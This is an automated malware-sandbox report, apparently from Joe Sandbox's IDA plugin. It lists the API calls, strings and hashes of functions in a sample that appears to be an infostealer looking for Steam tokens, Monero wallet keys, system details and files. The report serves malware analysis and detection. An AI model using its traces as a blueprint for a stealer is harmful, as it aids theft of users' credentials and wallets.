                                      • Part of subcall function 00197970: GetSystemInfo.KERNEL32(001A0DFC), ref: 001979A0
                                      • Part of subcall function 00197970: wsprintfA.USER32 ref: 001979B6
                                      • Part of subcall function 00197BA0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013ADBC8,00000000,?,001A0DFC,00000000,?,00000000), ref: 00197BD0
                                      • Part of subcall function 00197BA0: RtlAllocateHeap.NTDLL(00000000), ref: 00197BD7
                                      • Part of subcall function 00197BA0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00197BF8
                                      • Part of subcall function 00197BA0: wsprintfA.USER32 ref: 00197C4C
                                      • Part of subcall function 00198260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DF8,00000000,?), ref: 001982CF
                                      • Part of subcall function 00198260: RtlAllocateHeap.NTDLL(00000000), ref: 001982D6
                                      • Part of subcall function 00198260: wsprintfA.USER32 ref: 001982F0
                                      • Part of subcall function 00197DC0: RegOpenKeyExA.KERNEL32(00000000,013AA9E0,00000000,00020019,00000000,001A05A6), ref: 00197E44
                                      • Part of subcall function 00197DC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00197EC6
                                      • Part of subcall function 00197DC0: wsprintfA.USER32 ref: 00197EF9
                                      • Part of subcall function 00197DC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00197F1B
                                      • Part of subcall function 00197DC0: RegCloseKey.ADVAPI32(00000000), ref: 00197F2C
                                      • Part of subcall function 00197DC0: RegCloseKey.ADVAPI32(00000000), ref: 00197F39
                                      • Part of subcall function 00198120: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0019816A
                                      • Part of subcall function 00198120: Process32First.KERNEL32(?,00000128), ref: 0019817E
                                      • Part of subcall function 00198120: Process32Next.KERNEL32(?,00000128), ref: 00198193
                                      • Part of subcall function 00198120: FindCloseChangeNotification.KERNEL32(?), ref: 00198201
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0019216B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleLastLogicalMemoryModuleNextNotificationPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                    • String ID:
                                    • API String ID: 2395215017-0
                                    • Opcode ID: 60e4261efb7387e8d05f3f520ca3908cf5742dffa0832f4619f7f94246566520
                                    • Instruction ID: e83c30c88d65650da814e1d96ef1f6f6a003899775ad9942624a905c9721ecfb
                                    • Opcode Fuzzy Hash: 60e4261efb7387e8d05f3f520ca3908cf5742dffa0832f4619f7f94246566520
                                    • Instruction Fuzzy Hash: 20722B72814118AACF19FB94DC92DEE737CAF65300F9042A9B51762061EF713B4CDAE6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 627b631e06452f3eca42f3ae67deba55145104b3113014fea4844e901afb9c18
                                    • Instruction ID: cb8f50655d7e6023640e7753ec88aa70986af74cbc16b122aec5c98291999ebf
                                    • Opcode Fuzzy Hash: 627b631e06452f3eca42f3ae67deba55145104b3113014fea4844e901afb9c18
                                    • Instruction Fuzzy Hash: 9861E4B5900209EFCF18EF94E994BEEB7B0BB48304F108598E505AB280D775AF94DF91
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
                                      • Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255
                                    • lstrlen.KERNEL32(00000000,00000000,001A0AB3), ref: 00194C0A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 2001356338-401951677
                                    • Opcode ID: 67c314b24a071b4cff1a60ba5b311250d042f04010c97983750627e85298c3b2
                                    • Instruction ID: 0c6a681acad1b22d501ac7e8ddf6d5de71aa869980a2cdc33d2107bb0cae94cd
                                    • Opcode Fuzzy Hash: 67c314b24a071b4cff1a60ba5b311250d042f04010c97983750627e85298c3b2
                                    • Instruction Fuzzy Hash: A4F0B672D101086ACF04FBB0EC679ED772CAF65340F804668B816620A2EF656A1D87E2
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 5559dd09399b3d4d711af3cdfcad18ce6e5ddc87e0634ecc1fc6c0fd488623a4
                                    • Instruction ID: 08f7529f04f61dfac5eb142e30f6fa1d0cb9bf430f20dc9ee565365e05f94100
                                    • Opcode Fuzzy Hash: 5559dd09399b3d4d711af3cdfcad18ce6e5ddc87e0634ecc1fc6c0fd488623a4
                                    • Instruction Fuzzy Hash: 35D05E7490020CDFCB00EFE09989AEDBB7DAB0E311F001655ED0562340DB305441CB65
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE
                                    • lstrlen.KERNEL32(00000000), ref: 0018B820
                                    • lstrlen.KERNEL32(00000000), ref: 0018B834
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID:
                                    • API String ID: 3073930149-0
                                    • Opcode ID: f93927fd2564edd4825aa4afb89aa00dbb04681f46e46110b225c77a5c39de93
                                    • Instruction ID: fd59819589fee08d383e52228220e29266464f6913bcb13d1476217e6ec80790
                                    • Opcode Fuzzy Hash: f93927fd2564edd4825aa4afb89aa00dbb04681f46e46110b225c77a5c39de93
                                    • Instruction Fuzzy Hash: B4E19972910118AACF15FBA4DC92EEE7338BF65300F804569F506660A1EF746B4CCBE2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • lstrlen.KERNEL32(00000000), ref: 0018AFEA
                                    • lstrlen.KERNEL32(00000000), ref: 0018AFFE
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 061cfd2e5aeaacee179f156f760a5a29d8be67cece126fa63be8f321d99e85dd
                                    • Instruction ID: 3b7de42e673c92c87271a61e61f8ac1d4f6f1030f510281d90b894495f5d930e
                                    • Opcode Fuzzy Hash: 061cfd2e5aeaacee179f156f760a5a29d8be67cece126fa63be8f321d99e85dd
                                    • Instruction Fuzzy Hash: 0A91BB72910108ABCF15FBA4DC96EEE7378AF65300F904569F507660A1EF746A4CCBE2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • lstrlen.KERNEL32(00000000), ref: 0018B2AE
                                    • lstrlen.KERNEL32(00000000), ref: 0018B2C2
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 89a3f11541951aa9abb947d31fab7db66245551790c5530c3fd2d92ed274f4ba
                                    • Instruction ID: 50a5eb1851fd3fd9110f79f67173b188c66a3ca3bdfb7dcb1417d11dedff269a
                                    • Opcode Fuzzy Hash: 89a3f11541951aa9abb947d31fab7db66245551790c5530c3fd2d92ed274f4ba
                                    • Instruction Fuzzy Hash: DD719A72910118AACF15FBA4DC96DEE7379BF65300F804529F506A61A1EF746A0CCBE2
                                    APIs
                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                    • lstrcat.KERNEL32(?,00000000), ref: 001946CA
                                    • lstrcat.KERNEL32(?,013AD738), ref: 001946E8
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
                                      • Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
                                      • Part of subcall function 001943F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
                                      • Part of subcall function 001943F0: FindClose.KERNEL32(000000FF), ref: 00194672
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 00194490
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A08BA), ref: 001944A5
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 001944C2
                                      • Part of subcall function 001943F0: PathMatchSpecA.SHLWAPI(?,?), ref: 001944FE
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,013AE500), ref: 0019452A
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FC8), ref: 0019453C
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194550
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FCC), ref: 00194562
